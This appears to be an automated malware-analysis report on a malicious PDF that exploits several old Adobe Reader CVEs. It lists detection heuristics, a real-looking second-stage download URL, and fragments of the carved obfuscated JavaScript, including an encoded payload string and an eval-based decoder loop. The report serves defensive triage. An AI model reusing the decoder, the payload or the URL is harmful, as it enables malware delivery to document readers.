MALICIOUS
458
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
This PDF file contains heavily obfuscated JavaScript that exploits multiple CVEs (CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, CVE-2008-2992) to download a second-stage payload. The deobfuscated JavaScript reveals embedded URLs pointing to a suspicious domain, indicating a downloader or exploit delivery mechanism. The ML classifier also flagged this as highly malicious.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 11
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after static deobfuscation)
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after static deobfuscation)
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after static deobfuscation)
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after static deobfuscation)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
JavaScript action low 3 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
-
PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URLDecoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.simposiobolivariano.org:8080/news/sought-buildings-belong.php?jbuftjkz=33:33:2v:30:1k&hlie=30:1l:33:1f:32:1i:2w:30:32:2w&letjy=1h&fgwyufj=ovlyjvai&gdauzmoj=mtdiywc Referenced by PDF JavaScript
- http://www.simposiobolivariano.org:8080/news/sought-buildings-belong.php?tqwrhfos=33:33:2v:30:1k&yuvtyrj=2v:1o:33:32:1l:31:32:1o:1j:30&askygj=1h&znt=nelp&rlstn=apxgoeReferenced by PDF JavaScript
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
- http://www.iec.chReferenced by PDF JavaScript
Extracted artifacts 4
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0019_000.jsee04450404d9ef751ba4405bd71b3c860f8f4ac2e00d2c7ceb99d3743f9d8939 |
pdf-javascript-stream | PDF /JS object 19 at offset 0x2DF | 10004 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 10 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
xx='b'; a='353d3m3a1u18163o1p1k1n1n163o3936381l163o1p1m3936163o1o1m381l163o381q1k1l163o1k1k1m39163o1n1l361h163o1l1h1p35163o1p351k1h163o1h361l1h163o1o1h1p35163o1m1n1i36163o1o1n1p35163o1k1k1h1p163o1n1n3735163o1m381p35163o1h1k1k36163o1k1k1o1l163o1p1i1j36163o1i1m3838163o39391i1h163o351p3939163o1l1h1p35163o361k1k1h163o1k1q1l1n163o1o1m1h1n163o1p1o3935163o1j1l1k1l163o381l1p1m163o1m1i1o1m163o3835381q163o1m1i1l36163o1p351m1n163o1k361o1m163o1o1l1p35163o1o1p1k1m163o391m1h1k163o1p351m1n163o1j1h1o1n163o391m1h1k163o361q1k1k163o1l1i1l1q163o34373936163o361m1h1k163o37351k1k163o35381h39163o1k1p1i1h163o1o1l391j163o361i1h1p163o1h373635163o37341h1k163o38351l1h163o1k35391i163o1o1m1i39163o1m38381n163o1m381p35163o1h1k1j1l163o1n1n3737163o1h361p35163o1p371l35163o38361l1n163o1m1l3939163o1h361j1l163o371p1p35163o37371h1k163o1h1l1p35163o1h1k1p35163o3435361m163o1m1q1m38163o3835361k163o34371m1k163o1n1p1p35163o1p1h1j1h163o1h361o37163o1o1l1k1k163o1q1n1h1k163o391k3835163o1n1p1p35163o1p351h1p163o1n34391o163o1m1q1h1m163o1q1p381p163o39393939163o381j3939163o381p391q163o1h1h1h1h163o1h1h1h1h163o1m1h1m1p163o1l1h1n34163o39391n1p163o1h1h1h1h163o1m1h1h1h163o361h1p1k163o1m1h1i1q163o1p351m1m163o1p353836163o1i1h1m38163o361k1p1k163o39391h1m163o1n1p381k163o1n381n39163o1h1h1h1h163o1o1m1n1p163o1n361o1j163o1m1l1n37163o1i1n3939163o361l1p1k163o1p351h1p163o381p381p163o39391n1i163o39393939163o1h1j3835163o1o1j3835163o38361p1i163o1h1i1h1l163o1h1h1h1h163o1m361p37163o1h361j1l163o1h1l361o163o1o1j1j1l163o1n1o1n1m163o361o1o1k163o1j1l1l1l163o1o1n1h1l163o1k1k1o1j163o361o1k1j163o1j1l1l1l163o1j1h1h1p163o1o1k1j37163o1m1k1j1h163o391p1n1p163o1h1h1h1h163o39391h1h163o1h361m1n163o381p1p35163o361q1k1k163o361o1m1i163o1i371l1l163o1o1o1h1h163o1n1j1o1h163o361o1o1l163o1i371l1l163o1j381h1m163o1n361n1l163o361n1n36163o1i371l1l163o1h1h1h1q163o1p341m1q163o1h1l361i163o1p1p1k1h163o1i371l1l163o1l1i1h1l163o1n341m1i163o1n341h1h163o1m1k1h1h163o1n341m1o163o39391h1h163o1i1l1m1n163o361h1p1m163o1i1n1o1m163o1h1h1n34163o39391m1k163o1h1l1m1n163o1h1h1n34163o38351p1k163o1m1k1h36163o1m1n3939163o1p1k1h1l163o1h36361k163o1h1j3835163o1i1k3835163o1p1h1l1o163o1h1h1k39163o39341o1m163o1p1h1l1o163o1h1h1k39163o361l1o1m163o1h1h1n34163o39381n34163o1m1n3939163o381p1h1p163o39381q36163o39393939163o1l381p38163o38361h38163o39381q1p163o1h381p34163o1n391p1q163o35371h1i163o36341k1k163o1m351p34163o361n1i35163o1o1q1l1n163o1i341k1n163o1o1h1j39163o1o1l1n1p163o1o1h1o1l163o1j391k34163o1o1o1j39163o1o1o1o1o163o1o1k1j38163o1n371n1q163o1n391o1h163o1n1q1o1k163o1n1j1n39163o1n361n39163o1o1n1n1q163o1o1j1n1i163o1n1i1n1q163o1n391n38163o1n391j38163o1n1o1o1j163o1k1p1k34163o1k1p1k1h163o1j391k1h163o1n1m1n38163o1o1k1o1o163o1o1k1j39163o1o1m1n39163o1n1p1n1o163o1j371o1l163o1o1m1n1j163o1n361n1q163o1n1q1n1l163o1n1o1n38163o1j371o1k163o1n1m1n1j163o1n391n36163o1n1o1n38163o1o1h1j38163o1o1h1n1p163o1n341k39163o1o1m1n1j163o1o1l1n1n163o1n351n34163o1k371o34163o1k1k1k1k163o1k1k1k34163o1k341k1k163o1o1n1k1j163o1k1k1k34163o1k341k1h163o1n351k1i163o1n1p1j1n163o1n1q1n36163o1k371n1m163o1k1h1k1k163o1k1i1k34163o1k341n36163o1k1k1k1k163o1k1i1k34163o1k341n1n163o1k1j1k1k163o1k1i1k34163o1k341n1q163o1o1o1k1j163o1k1k1k34163o1k341k1h163o1k1j1k1k163o1k1j1k34163o1j1n1o1o163o1n1m1n36163o1n341o1l163o1k371o1q163o1n1p1k1i163o1n1n1j1n163o1o1o1n1o163o1o1m1o1q163o1n341n1n163o1n391k37163o1n361o1n163o1n341o1q163o1n1i1o1n163o1j1n1n1q163o1n1l1n1o163o1o1m1n1i163o1n371o34163o1n341n39163o1n371k37163o1n1l1o1l163o1o1q1n1q163o1n1k1o1o163o1n1p1h1h163o1o1l1o1l163o1k341o1h163o1j391j39163o1o1o1o1o163o1j381o1o163o1n1q1o1k163o1o1h1n37163o1o1k1n39163o1n391n1q163o1n391n1j163o1n1q1n36163o1n1i1o1n163o1n1q1o1j163o1n381n1i163o1j381n39163o1o1j1n39163o1k341n1o163o1k1h1k1p163o1k1h1k1p163o1n381j39163o1o1o1n1m163o1j391o1k163o1n391o1k163o1n1o1o1m163o1o1l1n1p163o1n1j1j37163o1n1q1o1m163o1n1l1n36163o1n381n1q163o1o1k1n1o163o1n1j1j37163o1n361n1m163o1n381n39163o1j381n1o163o1n1p1o1h163o1k391o1h163o1o1i1o1l163o1o1j1o1o163o1n1n1n1p163o1o1k1n39163o1k1k1k37163o1k341k1k163o1k1k1k1k163o1k1j1k34163o1k341o1n163o1k1h1k1k163o1k1i1k34163o1j1n1n35163o1o1m1o1q163o1o1l1o1n163o1o1j1o1q163o1k371n34163o1o1n1k1j163o1k1i1k34163o1k341n39163o1k1k1k1k163o ... (truncated) |
|||
deobfuscated.js9e28fc20013096cf11b8ac2a8c5e438cbd9c51579cc45980c73a5a16f177b198 |
deobfuscated-js | PDF JavaScript deobfuscation pass | 26323 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 15 eval/decoder/string-building token(s). Carved artifact contains 11 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
� [ � # p ` � �{ �� �
J U K
- �
/CS0 cs 1 scn 10 765.75 591.75 -729.75 re f BT 0 scn /TT0 1 Tf 12 0 0 12 16 749.25 Tm ( )Tj ET
�ADBE mntrGRAYXYZ � acspAPPL none �� �-ADBE cprt � 2desc � iwtpt ` bkpt t kTRC � text Copyright 1999 Adobe Systems Incorporated desc Gray Gamma 2.2 XYZ �T �XYZ curv 3
HLino mntrRGB XYZ � 1 acspMSFT IEC sRGB �� �-HP cprt P 3desc � lwtpt � bkpt rXYZ gXYZ , bXYZ @ dmnd T pdmdd � �vued L �view � $lumi � meas $tech 0 rTRC < gTRC < bTRC < text Copyright (c) 1998 Hewlett-Packard Company desc sRGB IEC61966-2.1 sRGB IEC61966-2.1 XYZ �Q �XYZ XYZ o� 8� �XYZ b� �� �XYZ $� � ��desc IEC http://www.iec.ch IEC http://www.iec.ch desc .IEC 61966-2.1 Default RGB colour space - sRGB .IEC 61966-2.1 Default RGB colour space - sRGB desc ,Reference Viewing Condition in IEC61966-2.1 ,Reference Viewing Condition in IEC61966-2.1 view �� _. � �� \� XYZ L V P W �meas � sig CRT curv
# ( - 2 7 ; @ E J O T Y ^ c h m r w | � � � � � � � � � � � � � � � � � � � � � � � � �
% + 2 8 > E L R Y ` g n u | � � � � � � � � � � � � � � � � & / 8 A K T ] g q z � � � � � � � � � � � � ! - 8 C O Z f r ~ � � � � � � � � � � - ; H U c q ~ � � � � � � � � �
+ : I X g w � � � � � � � � ' 7 H Y j { � � � � � � � + = O a t � � � � � � � 2 F Z n � � � � � � � % : O d y � � � � � �
'
=
T
j
�
�
�
�
�
� " 9 Q i � � � � � � * C \ u � � � � �
&
@
Z
t
�
�
�
�
� . I d � � � � % A ^ z � � � � & C a ~ � � � � 1 O m � � � � & E d � � � � # C c � � � � ' I j � � � � 4 V x � � � & I l � � � � A e � � � � @ e � � � � E k � � � * Q w � � � ; c � � � * R { � � � G p � � � @ j � � � > i � � � A l � � �! !H!u!�!�!�"'"U"�"�"�#
#8#f#�#�#�$ $M$|$�$�% %8%h%�%�%�&'&W&�&�&�' 'I'z'�'�(
(?(q(�(�) )8)k)�)�* *5*h*�*�+ +6+i+�+�, ,9,n,�,�- -A-v-�-�. .L.�.�.�/$/Z/�/�/�050l0�0�1 1J1�1�1�2*2c2�2�3
3F3 3�3�4+4e4�4�5 5M5�5�5�676r6�6�7$7`7�7�8 8P8�8�9 9B9 9�9�:6:t:�:�;-;k;�;�<'<e<�<�="=a=�=�> >`>�>�?!?a?�?�@#@d@�@�A)AjA�A�B0BrB�B�C:C}C�D DGD�D�E EUE�E�F"FgF�F�G5G{G�H HKH�H�I IcI�I�J7J}J�K KSK�K�L*LrL�M MJM�M�N%NnN�O OIO�O�P'PqP�Q QPQ�Q�R1R|R�S S_S�S�TBT�T�U(UuU�V V\V�V�WDW�W�X/X}X�Y YiY�Z ZVZ�Z�[E[�[�\5\�\�]']x]�^ ^l^�_ _a_�` `W`�`�aOa�a�bIb�b�cCc�c�d@d�d�e=e�e�f=f�f�g=g�g�h?h�h�iCi�i�jHj�j�kOk�k�lWl�m m`m�n nkn�o oxo�p+p�p�q:q�q�rKr�s s]s�t tpt�u(u�u�v>v�v�wVw�x xnx�y*y�y�zFz�{ {c{�|!|�|�}A}�~ ~b~� # � �G���
�k�͂0����W��� ����G��� �r�ׇ;��� �i�Ή3�����d�ʋ0�����c�ʍ1�����f�Ώ6��� �n�֑?��� �z��M��� �����_�ɖ4���
�u���L���$�����h�՛B��� �����d�Ҟ@��� �����i�ءG���&��� �v��V�ǥ8��� �����n��R�ĩ7��� ��� �u��\�ЭD���-��� ��� �u��`�ֲK�³8���%��� ��� �y��h��Y�ѹJ�º;���.���!��� ���
�����z���p���g���_���X���Q���K���F���Aǿ�=ȼ�:ɹ�8ʷ�6˶�5̵�5͵�6ζ�7ϸ�9к�<Ѿ�?���D���I���N���U���\���d���l���v��ۀ� ܊� ݖ� ޢ�)߯�6��D���S���c���s����
�� ��2��F���[���p���� ��(��@���X���r���� ��4���P���m����� ���8���W���w� ���)���K���m��
D�a1@�
/Helv 0 Tf 0 g
test
(event.name+'').substr(0,3)=='O'+'pe'){t=event;}
p=t.target[String.fromCharCode.apply(String,[112,97,114,115,101,73,110,116])];
for(i=0;i<a.length;i+=2){
jj = 0;
s+=String.fromCharCode(p(a.substr(i,2),30+1));
}
t.target[(xx=='b')?('ev'+l):0](s);
* � ��(%�8 H ��� �8c �-��
f�ԉd� 9 � @6_Ij H��9���(3=�D����R�1%?
�$5 � j � %V*�'��&* � ��r" (,
... (truncated)
|
|||
icc_00_off000030b4.icc653b586c4707574ffcd648ba35494daed2c76ceafcf4c07d315ed961b1dc347f |
pdf-icc-profile | PDF ICC profile at offset 0x30B4 | 408 bytes |
icc_01_off0000334f.icc2b3aa1645779a9e634744faf9b01e9102b0c9b88fd6deced7934df86b949af7e |
pdf-icc-profile | PDF ICC profile at offset 0x334F | 3144 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.